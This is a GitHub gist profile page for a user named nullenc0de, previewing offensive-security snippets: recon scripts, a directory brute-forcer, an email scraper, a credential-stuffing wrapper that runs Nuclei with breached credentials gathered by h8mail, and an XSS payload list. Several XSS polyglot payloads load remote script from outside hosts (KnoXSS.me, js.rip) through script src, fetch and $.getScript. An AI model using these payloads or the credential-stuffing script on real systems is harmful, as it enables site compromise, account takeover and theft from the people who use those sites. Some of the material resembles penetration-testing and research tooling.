Skip to content

Instantly share code, notes, and snippets.

View nullenc0de's full-sized avatar

nullenc0de

190 followers · 0 following
View GitHub Profile
@nullenc0de
nullenc0de / sort.sh
Created November 26, 2023 14:28
Sort the tlsx output
#!/bin/bash
declare -A companies
while read -r line; do
domain=$(echo "$line" | awk -F'[:[]' '{print $1}' | tr -d ' ')
company=$(echo "$line" | awk -F'[][]' '{print $2}' | tr -d ' ')
if [ -n "$domain" ] && [ -n "$company" ]; then
if [ -z "${companies[$company]}" ]; then
@nullenc0de
nullenc0de / gist:14989ca1d0f48b6797a9d8df2505638e
Created November 25, 2023 15:52
company finder
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes[] | select(.region | startswith("us")) | .ip_prefix' | sort -u | tlsx -san -cn -silent -nc | awk -F'[][]' '{print $2}' | unfurl format %r.%t |tee aws_company.txt
sort ./aws_company.txt | uniq -c | sort -nr | awk '$1 >= 500'
@nullenc0de
nullenc0de / cred_stuffer.py
Created September 24, 2023 13:18
h8mail -t "$1" -q domain -c ./h8mail_config.ini --skip -o /tmp/"$1".h8mail.csv && cat /tmp/"$1".h8mail.csv |grep "$1": |cut -d "-" -f2|tr -d ' ' |grep "$1" |sort -u
import subprocess
import argparse
# Define the command to run Nuclei
nuclei_command = "nuclei -silent -t credential-stuffing/cloud -var username={} -var password={}"
# Create a command-line argument parser
parser = argparse.ArgumentParser(description='Credential Stuffing Scanner')
# Add an argument for specifying the creds.txt file
@nullenc0de
nullenc0de / xss_payloads.txt
Last active August 4, 2024 23:02
XSS_Payloads
<Script/Src=//KnoXSS.me/00?1=1290></Script>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:KnoXSS.me\00?1=1290/.source))//>
JavaScript://%250A0?1:import(/https:KnoXSS.me\00?1=1290/.source)//*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(d=document,d.body.appendChild(d.createElement(/script/.source)).src=/https:\\KnoXSS.me\00?1=1290/.source)}//\76-->
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script>
@nullenc0de
nullenc0de / wordlistfinder.py
Created May 28, 2023 14:04
Find Best Wordlist
import os
def find_best_wordlists(user_word, max_wordlists):
wordlists_dir = '/opt/OneListForAll/dict'
wordlists = os.listdir(wordlists_dir)
matched_wordlists = []
for wordlist in wordlists:
if user_word.lower() in wordlist.lower():
@nullenc0de
nullenc0de / 365doms.py
Created February 23, 2023 01:37
modified from https://github.com/expl0itabl3/check_mdi
#!/usr/bin/env python3
"""
Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance.
Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance.
Usage: ./check_mdi.py -d <domain>
"""
import argparse
import dns.resolver
@nullenc0de
nullenc0de / aodirb.py
Created November 21, 2022 15:17
pip3 install asyncio and pip3 install import aiohttp
import asyncio
import aiohttp
import time
import sys
import argparse
import os
parser = argparse.ArgumentParser(description='Directory Bruteforce')
parser.add_argument('-u', '--url', help='URL to bruteforce', required=True)
parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True)
@nullenc0de
nullenc0de / rss_feed.py
Created August 30, 2022 19:20
|grep -B1 "$(date "+%b %Y")"
import feedparser
import webbrowser
feeds = ["https://blog.liftsecurity.io/feeds/all.atom.xml","https://winscripting.blog/feed/","https://shells.systems/feed/","http://r00tsec.blogspot.com/feeds/posts/default","https://nullsweep.com/rss/","http://rewtdance.blogspot.com/feeds/posts/default","https://www.youtube.com/playlist?list=UUOn5uwA42XWUnrjTilwG0xg","https://www.peew.pw/blog?format=RSS","http://syspanda.com/index.php/feed/","https://www.contextis.com/rss/blog","http://www.blackhillsinfosec.com/?feed=rss2","http://blog.ahmednabeel.com/rss/","https://cobbr.io/feed.xml","http://pen-testing.sans.org/blog/feed/","http://b4rtik.blogspot.com/feeds/posts/default","https://its-a-feature.github.io/feed.xml","https://chrislazari.com/feed/","https://pentesterslife.wordpress.com/feed/","https://labs.nettitude.com/feed/","https://stealthbits.com/blog/feed/","http://feeds.feedburner.com/CyberArms","https://wald0.com/?feed=rss2","http://www.thespanner.co.uk/feed/","http://www.wired.com/threatlevel/feed/","https://warroo
@nullenc0de
nullenc0de / email_scrape.py
Created August 30, 2022 19:18
import re
import csv
import time
import urllib.request
# Enter the URL you want to start from
url = input("Enter the starting URL: ")
# This is where we store the links we've already visited
visited = set()
@nullenc0de
nullenc0de / Missing_plugins
Last active August 16, 2022 17:29
Find Missing Scanner Plugins
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' |while read cve; do echo "https://www.tenable.com/plugins/search?q=cves%3A%28%22$cve%22%29&sort=&page=1" |httpx -silent -match-string "No results found" ; done
Find Active Exploits
cat /tmp/cve.txt |cut -d "%" -f4 | cut -c 3- |while read cve; sleep 5s; do echo "https://github.com/trickest/cve/search?q=$cve" |httpx -silent -match-string "code result" ; done